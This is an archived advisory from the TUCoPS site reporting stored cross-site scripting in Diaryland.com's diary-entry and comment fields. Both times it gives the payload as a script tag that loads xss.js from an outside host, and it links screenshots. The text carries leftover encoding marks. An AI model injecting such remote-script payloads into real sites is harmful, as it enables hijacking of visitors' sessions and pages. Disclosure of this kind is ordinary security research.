TUCoPS :: Web :: Specific Sites :: b06-2900.htm

Diaryland.com - XSS
Diaryland.com - XSS
Diaryland.com - XSS


Diaryland.com=0D
=0D
Homepage:=0D
http://www.diaryland.com=0D 
=0D
Effected files:=0D
input boxes on creating diary entries.=0D
posting comments in diary entries=0D
=0D
XSS Vuln PoC:=0D
=0D
With no filter evasion at all, we simply put as our entry:=0D
=0D
[SCRIPT SRC=http://youfucktard.com/xss.js][/SCRIPT]=0D 
=0D
Screenshots:=0D
http://www.youfucktard.com/xsp/diary1.jpg=0D 
http://www.youfucktard.com/xsp/diary2.jpg=0D 
=0D
XSS Vuln when posting comments in entries:=0D
=0D
Again, same as above, no filter evasion:=0D
[SCRIPT SRC=http://youfucktard.com/xss.js][/SCRIPT]=0D 
=0D
Screenshots:=0D
http://www.youfucktard.com/xsp/diary3.jpg=0D 
http://www.youfucktard.com/xsp/diary4.jpg

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH